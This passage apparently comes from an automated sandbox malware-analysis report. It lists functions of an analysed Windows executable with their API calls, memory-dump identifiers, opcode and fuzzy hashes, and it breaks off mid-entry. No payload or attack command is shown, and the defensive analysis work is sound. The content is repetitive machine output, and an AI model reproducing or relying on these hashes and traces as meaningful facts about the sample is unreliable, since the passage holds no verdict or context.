                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3384502665-0
                                                                                                                                              • Opcode ID: ebc8b17013044a55624bf79895947c7aba81f2b12cff67d93ce8b63f0bf7c138
                                                                                                                                              • Instruction ID: 753ad0f5e46b68682b0d373a57b70d68207eba0a8fe5c42bdb6e2b9dfc4e7a6e
                                                                                                                                              • Opcode Fuzzy Hash: ebc8b17013044a55624bf79895947c7aba81f2b12cff67d93ce8b63f0bf7c138
                                                                                                                                              • Instruction Fuzzy Hash: 11F0B471207234BF92209B669C48CABBFACFE8B3A4B50453AF544C2100C3755801CBF9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041111A Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • IntersectRect.USER32(?,00000000,?), ref: 0041114B
                                                                                                                                              • EqualRect.USER32(?,00000000), ref: 00411158
                                                                                                                                              • IsRectEmpty.USER32(?), ref: 00411162
                                                                                                                                              • InvalidateRect.USER32(?,?,?), ref: 0041117F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3354205298-0
                                                                                                                                              • Opcode ID: b96f505ea3630a247bd448bdacb66984f0b113bced7556e7e02f6fbeb0dcfbd3
                                                                                                                                              • Instruction ID: 4fe3f08868a5226f7d3e4c173db8bd2c93613d59b8a0c76e427b94b244e74582
                                                                                                                                              • Opcode Fuzzy Hash: b96f505ea3630a247bd448bdacb66984f0b113bced7556e7e02f6fbeb0dcfbd3
                                                                                                                                              • Instruction Fuzzy Hash: 49010C71A0011AEBCF11DFA4DC48E9BB7BDFF09314F808472FA15D6110D275A51A8B64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042633E Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,?,000000F0), ref: 00426360
                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,00422CD3,?,?,00401A10,?,?,?,?,?,0042DD38), ref: 0042636C
                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,00422CD3,?,?,00401A10,?,?,?,?,?,0042DD38,000000FF), ref: 00426379
                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,00422CD3,?,?,00401A10,?,?,?,?,?,0042DD38,000000FF), ref: 00426394
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindFreeLoadLock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1078018258-0
                                                                                                                                              • Opcode ID: 4c303f29aad7c5551cea9d80b4e0defa102d9efb6e724846d62db9275e0aa396
                                                                                                                                              • Instruction ID: 76cf06ceb5d42f02d60e4406da92eb06dd1ed344124334fc899015a258015dc8
                                                                                                                                              • Opcode Fuzzy Hash: 4c303f29aad7c5551cea9d80b4e0defa102d9efb6e724846d62db9275e0aa396
                                                                                                                                              • Instruction Fuzzy Hash: 40F0F63A3012229B83205FA66C4497BB7ACEFC67627C6007AFD08C2211DF258C06857C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004226AE Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnableMenuItem.USER32(?,?,?), ref: 004226D9
                                                                                                                                              • GetFocus.USER32 ref: 004226EC
                                                                                                                                              • GetParent.USER32(?), ref: 004226FA
                                                                                                                                              • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 0042270F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnableFocusItemMenuMessageParentSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2297321873-0
                                                                                                                                              • Opcode ID: d719d4f1826348346d23ac329250c9ff44aabbd6e9454e1dd4734ed6490b57f8
                                                                                                                                              • Instruction ID: 617dea23d70acb73f8f92018a64976e9019581151da9ed12eae54fe0019a468e
                                                                                                                                              • Opcode Fuzzy Hash: d719d4f1826348346d23ac329250c9ff44aabbd6e9454e1dd4734ed6490b57f8
                                                                                                                                              • Instruction Fuzzy Hash: 0E015E31204610ABDB389F10ED49F56BBB0EF90755F90863EF142921E0CBB4A895CA48
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00428CB2 Relevance: 6.0, APIs: 4, Instructions: 35stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00428CCA
                                                                                                                                              • GetWindowTextA.USER32(?,?,00000100), ref: 00428CE6
                                                                                                                                              • lstrcmpA.KERNEL32(?,?), ref: 00428CFA
                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00428D0A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: TextWindow$lstrcmplstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 330964273-0
                                                                                                                                              • Opcode ID: e7043af6485233e72652ee463e779a3a2077c7ee8e68495221b17dea8af2fa28
                                                                                                                                              • Instruction ID: ab625cd30283d468c6a5a3a0154dbe0d4626f66796105f6a39e5641a5fe47872
                                                                                                                                              • Opcode Fuzzy Hash: e7043af6485233e72652ee463e779a3a2077c7ee8e68495221b17dea8af2fa28
                                                                                                                                              • Instruction Fuzzy Hash: 35F06D75600018EBCF21AF60ED449CE7BB9EF18358F808072F909D62A0DB74DE59DB48
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042C0F6 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0042C118
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0042C125
                                                                                                                                              • CoFreeUnusedLibraries.OLE32 ref: 0042C134
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0042C13A
                                                                                                                                                • Part of subcall function 0042C09F: CoFreeUnusedLibraries.OLE32(00000000,0042C17F,00000000,?,?,004119DD), ref: 0042C0E3
                                                                                                                                                • Part of subcall function 0042C09F: OleUninitialize.OLE32(?,?,004119DD), ref: 0042C0E9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 685759847-0
                                                                                                                                              • Opcode ID: b5874d32bad5070bf434eb1db7257aa41fe591bf19fa899e05926cb079051f1c
                                                                                                                                              • Instruction ID: fa01731afa84a5c76d3ef70e4e48df64ef66ba0b78331b06acedfa9e6f689827
                                                                                                                                              • Opcode Fuzzy Hash: b5874d32bad5070bf434eb1db7257aa41fe591bf19fa899e05926cb079051f1c
                                                                                                                                              • Instruction Fuzzy Hash: C9E0E534A04224DAE724AF74FC8932D7AA4EB56311FD1883BD041A2162C73858D5CE9E
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040309E Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 281COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DecrementInterlockedlstrlen
                                                                                                                                              • String ID: (1D
                                                                                                                                              • API String ID: 3894653158-2129874033
                                                                                                                                              • Opcode ID: bd28ca77c038792ffbe5868c204803e66c6c098a52fe2d6f0d143d211d85f30c
                                                                                                                                              • Instruction ID: 858d2aefe05a656e08fe5f4863ded23aa7559c905939fa8f8aa05e635d827225
                                                                                                                                              • Opcode Fuzzy Hash: bd28ca77c038792ffbe5868c204803e66c6c098a52fe2d6f0d143d211d85f30c
                                                                                                                                              • Instruction Fuzzy Hash: AEB14871C00119AEDB01EBE5CD86EEEBBB8AF19304F50416EF501B31D2DB785A09DBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041084F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClearVariant
                                                                                                                                              • String ID: @$@
                                                                                                                                              • API String ID: 1473721057-149943524
                                                                                                                                              • Opcode ID: 54e3d7c58431ed1a8a2faafa339e1a674b98199fcfceda2c24aa9145b0b1d073
                                                                                                                                              • Instruction ID: 7d4217390c867d17d4dff42acfee68232351a7b4ec1a73aaeb500dadfbc22095
                                                                                                                                              • Opcode Fuzzy Hash: 54e3d7c58431ed1a8a2faafa339e1a674b98199fcfceda2c24aa9145b0b1d073
                                                                                                                                              • Instruction Fuzzy Hash: 8C51A6B1A002199FDB04CF99C8849EEBBF5FF48314F14456EE506E7251E774A945CF60
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00417BB3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info
                                                                                                                                              • String ID: $
                                                                                                                                              • API String ID: 1807457897-3032137957
                                                                                                                                              • Opcode ID: ea25d807aac96f0c9d0dd241a4ad9b12794653fbfb175f80958580c13e1a6fab
                                                                                                                                              • Instruction ID: 25a5130d2be980f96d16b4b058943b934398b817a05338b1aaa33722a9e7f48b
                                                                                                                                              • Opcode Fuzzy Hash: ea25d807aac96f0c9d0dd241a4ad9b12794653fbfb175f80958580c13e1a6fab
                                                                                                                                              • Instruction Fuzzy Hash: FD41563110929C9FEB519B28DC99BFB3BF8EF06304F2808E2D545CB192D72849C59BD8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004038D9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104), ref: 004038F6
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 00403924
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharFileLowerMessageModuleNamelstrlen
                                                                                                                                              • String ID: .dll
                                                                                                                                              • API String ID: 1366549216-2738580789
                                                                                                                                              • Opcode ID: ed755644410f0a6ee9be1c8b2e18ebcf4b444024a13bcd5a83e04fb954c330c4
                                                                                                                                              • Instruction ID: e925d1146906c940dbfae2266fa14a7952d3259283bc435cb66516965c737666
                                                                                                                                              • Opcode Fuzzy Hash: ed755644410f0a6ee9be1c8b2e18ebcf4b444024a13bcd5a83e04fb954c330c4
                                                                                                                                              • Instruction Fuzzy Hash: 50319372A041195BDB15BBA19D42EEF375C6F00709F60013BF911B21E2DE7C9A05869D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00403FCF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104,?), ref: 00403FF6
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 0040402F
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharFileLowerMessageModuleNamelstrlen
                                                                                                                                              • String ID: .dll
                                                                                                                                              • API String ID: 1366549216-2738580789
                                                                                                                                              • Opcode ID: 7ee78063d823e0c6d8b8f1480ed479fa6a1540bc085ae308c9012322817352e7
                                                                                                                                              • Instruction ID: e6b5aef0d27c6589e7d05cc20d88ea959a984bc3c2dd37e4e74a46bfd1a24eba
                                                                                                                                              • Opcode Fuzzy Hash: 7ee78063d823e0c6d8b8f1480ed479fa6a1540bc085ae308c9012322817352e7
                                                                                                                                              • Instruction Fuzzy Hash: DC31A2B1900109ABDB11EBE1D942AEEB778EF15319F10403FF215F21D1EB784A08CB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00403A0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000104,?), ref: 00403A31
                                                                                                                                                • Part of subcall function 00401FE9: lstrlenA.KERNEL32(?,?,?,?,00402E72,?), ref: 00402008
                                                                                                                                              • CharLowerA.USER32(?,?,00000004,?), ref: 00403A67
                                                                                                                                                • Part of subcall function 00402C6D: MessageBoxA.USER32(00000000,?,00000000,00000030), ref: 00402D19
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharFileLowerMessageModuleNamelstrlen
                                                                                                                                              • String ID: .dll
                                                                                                                                              • API String ID: 1366549216-2738580789
                                                                                                                                              • Opcode ID: bb160a83ece6b52ad72d685bd7d2f3ba3769fc739be267bbfaec33bc36789f92
                                                                                                                                              • Instruction ID: 1cad220353df42b9fe3cb840776f885c9a0654f48a55dcbb27447a2c56b74ffd
